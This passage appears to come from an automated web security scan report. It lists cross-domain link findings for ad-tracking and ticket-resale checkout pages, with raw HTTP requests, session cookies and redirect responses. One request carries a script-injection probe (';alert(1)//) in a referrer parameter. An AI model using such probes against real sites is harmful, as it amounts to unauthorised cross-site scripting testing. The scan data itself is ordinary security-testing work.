Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 362
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster/AirCanadaCentre/L28/9647235/x01/USNetwork/Ticketmaster_DumpCampaign/1x1Pixel.gif/726348573830334f56626741436d4566?x" target="_blank"><IMG SRC="http://imagen04.247realmedia.com/RealMedia/ads/Creatives/USNetwork/Ticketmaster_DumpCampaign/1x1Pixel.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER="0"></A>

20.14. http://bcp.crwdcntrl.net/px  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /px

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /px?Yz03MyZweGlkPTY5MzE%3D HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/4/c=73%7Crand=653530971%7Cpv=y%7Crt=ifr
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=aa8272d1805895ab786afc266fb574e9; aud=ABR4nGNgYGDwU30Ry8DAaOgivDqIwZqBQUCJAQx6wSTPZQh1E0zxVzYwNDAwMK%2BB8KrAPNFEME80ASL4F0xxGIEpscdgimsGWKV4AZgncg6i0g1M8YVBVH4CU7zfILxKiJmHwPp4%2F0Ac8R7MEysC81ilwJTgV4jKnRDtzBDeLojL9kA0dEIE90N43RCV0hDBhRCj%2BcCUQCHEuRBXi4mDNQhdgwQIxHY2XjBH4j6ECgRTkk4QyhHiI1EwJb4PYuZxMCX0DEIVQ4zeAuGVQFSqQrxpCuGtgnjsAFhQwgviJH8gAQCsIzNY; cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rex%2FzeeOMbAwGjoIrw6CCTGwCPwvY2JgUGSgeE%2FiOsJpBkZGIEMIGZOqLDEJcco%2FdwUp5zAD32cZgr80MYt9%2B0KbjO%2FXcVjpjoeP4TgMfMUTrmEilSccsKqTjjtY%2FAJO5PNwsBwdm8zWFayAagKKG0BpBmBCr5A%2BILfZzMzMCht2Q8WPAukQSZAjAQylAJVnJjhhjBaomrW2mOKWzKtKgBkPYQDcyS69WFnKnCbIPP%2FCD7J04R957%2BrgLCisDMFMIcy4HRooEo0vnBQwC0p%2BL2NGW48umSgSgxhB8qaXeQAKWoBh6QSkAZKwk0COxhNE5Bm4rg4HcwHJwtGYDpRArLl9MtxuzSAdx%2B17PH%2BUoIvuGRwSwYuYqaWI7T2SOC2R2F%2FMz4XihKOFq76Bmq51M36HHIuhNkLzo0gsxX2t%2BN2rH%2F%2BXrya3azP4tbs%2FSUdn2Qabkk5wy24JYXVLPG6SVgNT8nh%2FSUfr%2BackzOBAWkKDkAGxeTvhKMqqJoJVx5kAIbfOsL5P0w4A19aeoNHcgM%2FYQe6WS%2FEbYKb9SLckqE9M%2FHpXI1bMky4El%2BiOkqMq7fjM%2BEwbsl4lt34HFaAWzLR8hzhakV%2BBh8xRboU3mQWz7KHiMpDtZKwotT7soTdrHAJT3h5vbiObAI2axgYuFonUatAClRRwlNEqyjjllRcVkc4QGT%2B7yesKFBFG2%2F8eL24gTtTe724hVtSWcABX7p9hiczr%2F9PjMMN8DSL1IhoFinsv4bbBL6Kt9SKZv%2F8F3hictZNwn4FAEhKFMU%3D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:26:05 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 213
Connection: close

<html><body><div><!-- Segment Pixel - Volvo XC60 id 6225 - DO NOT MODIFY -->
<script src="http://ib.adnxs.com/seg?add=153795&t=1" type="text/javascript"></script>
<!-- End of Segment Pixel -->
</div><
...[SNIP]...

20.15. http://bing.fansnap.com/checkout/clickout/415814268  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/clickout/415814268

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /checkout/clickout/415814268?quantity=2&ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DD05uNBjoLb2Zmc2V0af6QnQ%3D%3D--3f60618cc7127ee74d521a0ea1c28b136222eb4a

Response

HTTP/1.1 302 Found
Date: Tue, 19 Jul 2011 18:35:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
Cache-Control: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 92
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4B0YQSOBjoLb2Zmc2V0af6QnQ%3D%3D--cad52d757f88a1ee393908a1cef9017cb8688093; domain=fansnap.com; path=/; HttpOnly
Location: http://rover.ebay.com/rover/1/711-53200-19255-0/1?type=2&campid=5336216552&customid=1061888771&item=120749940240&ext=120749940240
Status: 302
Vary: Accept-Encoding
Content-Length: 211
Connection: close
Content-Type: text/html; charset=utf-8

<html><body>You are being <a href="http://rover.ebay.com/rover/1/711-53200-19255-0/1?type=2&amp;campid=5336216552&amp;customid=1061888771&amp;item=120749940240&amp;ext=120749940240">redirected</a>.</b
...[SNIP]...

20.16. http://bing.fansnap.com/checkout/clickout/418563179  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/clickout/418563179

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /checkout/clickout/418563179?quantity=2&ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2 HTTP/1.1
Host: bing.fansnap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A38966945f62%27%3balert(1)//460f48c4516
Cookie: ver=1; vid=1342567440282625; tvid=1342567440282625; _fancat_session=BAh7DzoPc2Vzc2lvbl9pZCIlYWU1YjVlMDMzMzExOTFjZmJhMjBkMmQxNWNlMjllZGE6DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgHOaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvYWpheF92ZXJpZnlfYXZhaWxhYmlsaXR5P3RpY2tldF9zZXRfaWQ9NDE4NTYzMTc5Jm5vbG89dHJ1ZSZwcmljZT02MiZjaD1iaW5nJnBvY3R4PXJhbmslM0QzNiUzQmNyYXdsU2NvcmUlM0RudWxsJTNCcG9wMSUzRDAuMDM3NCUzQnBvcDIlM0QwLjAzNzQlM0Jwb3AzJTNEMC4wMzc0JTNCJnF1YW50aXR5PTIGOgZFRjoPYmdfcmVmZXJlciICTgFodHRwOi8vYmluZy5mYW5zbmFwLmNvbS9jaGVja291dC9pbmRleC80MTg1NjMxNzk%2FY3R4PWMlM0R0aXglM0JtdCUzRGludCUzQnRzcCUzRDAlM0JkdCUzRDElM0JscG9zJTNEMiZjaD1iaW5nJnF1YW50aXR5PTImbHA9dHJ1ZSZwb2N0eD1yYW5rJTNEMzYlM0JjcmF3bFNjb3JlJTNEbnVsbCUzQnBvcDElM0QwLjAzNzQlM0Jwb3AyJTNEMC4wMzc0JTNCcG9wMyUzRDAuMDM3NCUzQiZhZm09JnVldD0tNzc2ODk2ODM2JTNBNzkyNSUzQXBnc3RpY2tldHMlN0MlN0NiaW5nJTdDbXQlM0FpbnQlM0JzeiUzQTEyNTQlM0JpZCUzQTM4OTY2OTQ1ZjYyJTI3JTNiYWxlcnQoMSkvLzQ2MGY0OGM0NTE2OhBiZ192aXNpdF9pZGkElMZhFjoSYmdfdmlzaXRvcl9pZCIVMTM0MjU2NzQ0MDI4MjYyNToRYmdfc3R5bGVfaWRzSSIABjsIRjoLYmdfbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUAOSSIRcHJwNDE4NTYzMTc5BjsIRkkiCTU4LjAGOwhGOhJsYXN0X2FjY2Vzc2VkSXU6CVRpbWUNc9obgBh%2B8JYGOgtvZmZzZXRp%2FpCd--8543264511d876e3c1d66e716e5849ffcab6d788; __utma=19633071.1263508421.1311101027.1311101027.1311104052.2; __utmc=19633071; __utmz=19633071.1311104052.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; lvd=1311101038; POOLID=B; __utmb=19633071; bg_ver=1; bg_vid=1342567440282625; bg_lvd=1311104266

Response

HTTP/1.1 302 Found
Date: Tue, 19 Jul 2011 19:37:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
Cache-Control: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 38
Set-Cookie: _fancat_session=BAh7DjoPc2Vzc2lvbl9pZCIlYWU1YjVlMDMzMzExOTFjZmJhMjBkMmQxNWNlMjllZGE6DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgHOaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvYWpheF92ZXJpZnlfYXZhaWxhYmlsaXR5P3RpY2tldF9zZXRfaWQ9NDE4NTYzMTc5Jm5vbG89dHJ1ZSZwcmljZT02MiZjaD1iaW5nJnBvY3R4PXJhbmslM0QzNiUzQmNyYXdsU2NvcmUlM0RudWxsJTNCcG9wMSUzRDAuMDM3NCUzQnBvcDIlM0QwLjAzNzQlM0Jwb3AzJTNEMC4wMzc0JTNCJnF1YW50aXR5PTIGOgZFRjoPYmdfcmVmZXJlciICTgFodHRwOi8vYmluZy5mYW5zbmFwLmNvbS9jaGVja291dC9pbmRleC80MTg1NjMxNzk%2FY3R4PWMlM0R0aXglM0JtdCUzRGludCUzQnRzcCUzRDAlM0JkdCUzRDElM0JscG9zJTNEMiZjaD1iaW5nJnF1YW50aXR5PTImbHA9dHJ1ZSZwb2N0eD1yYW5rJTNEMzYlM0JjcmF3bFNjb3JlJTNEbnVsbCUzQnBvcDElM0QwLjAzNzQlM0Jwb3AyJTNEMC4wMzc0JTNCcG9wMyUzRDAuMDM3NCUzQiZhZm09JnVldD0tNzc2ODk2ODM2JTNBNzkyNSUzQXBnc3RpY2tldHMlN0MlN0NiaW5nJTdDbXQlM0FpbnQlM0JzeiUzQTEyNTQlM0JpZCUzQTM4OTY2OTQ1ZjYyJTI3JTNiYWxlcnQoMSkvLzQ2MGY0OGM0NTE2OhBiZ192aXNpdF9pZGkElMZhFjoSYmdfdmlzaXRvcl9pZCIVMTM0MjU2NzQ0MDI4MjYyNToRYmdfc3R5bGVfaWRzSSIABjsIRjoLYmdfbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUAOOhJsYXN0X2FjY2Vzc2VkSXU6CVRpbWUNc9obgIsPZpcGOgtvZmZzZXRp%2FpCd--e286a72fc7d3fcd8ad684c8137e15e005a897918; domain=fansnap.com; path=/; HttpOnly
Location: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=862059306
Status: 302
Vary: Accept-Encoding
Content-Length: 172
Connection: close
Content-Type: text/html; charset=utf-8

<html><body>You are being <a href="http://www.stubhub.com/?ticket_id=303237644&amp;GCID=C12289x970&amp;quantity_selected=2&amp;gtkw=862059306">redirected</a>.</body></html>

20.17. http://bing.fansnap.com/checkout/clickout/418563179  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/clickout/418563179

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /checkout/clickout/418563179?quantity=2&ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AlY%2BiNBjoLb2Zmc2V0af6QnQ%3D%3D--188d6189626cb7901a210ce5a69621d12fd463f4

Response

HTTP/1.1 302 Found
Date: Tue, 19 Jul 2011 18:36:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
Cache-Control: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 74
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4A2rVCRBjoLb2Zmc2V0af6QnQ%3D%3D--28ac37f50b283343a71eb70a2f9c612588bd7793; domain=fansnap.com; path=/; HttpOnly
Location: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=65260005
Status: 302
Vary: Accept-Encoding
Content-Length: 171
Connection: close
Content-Type: text/html; charset=utf-8

<html><body>You are being <a href="http://www.stubhub.com/?ticket_id=303237644&amp;GCID=C12289x970&amp;quantity_selected=2&amp;gtkw=65260005">redirected</a>.</body></html>

20.18. http://bing.fansnap.com/checkout/index/415814268  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/index/415814268

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DolT2MBjoLb2Zmc2V0af6QnQ%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 19
ETag: "912210bf9f97f8eae912bcb4828410b5"
Cache-Control: private, max-age=0, must-revalidate
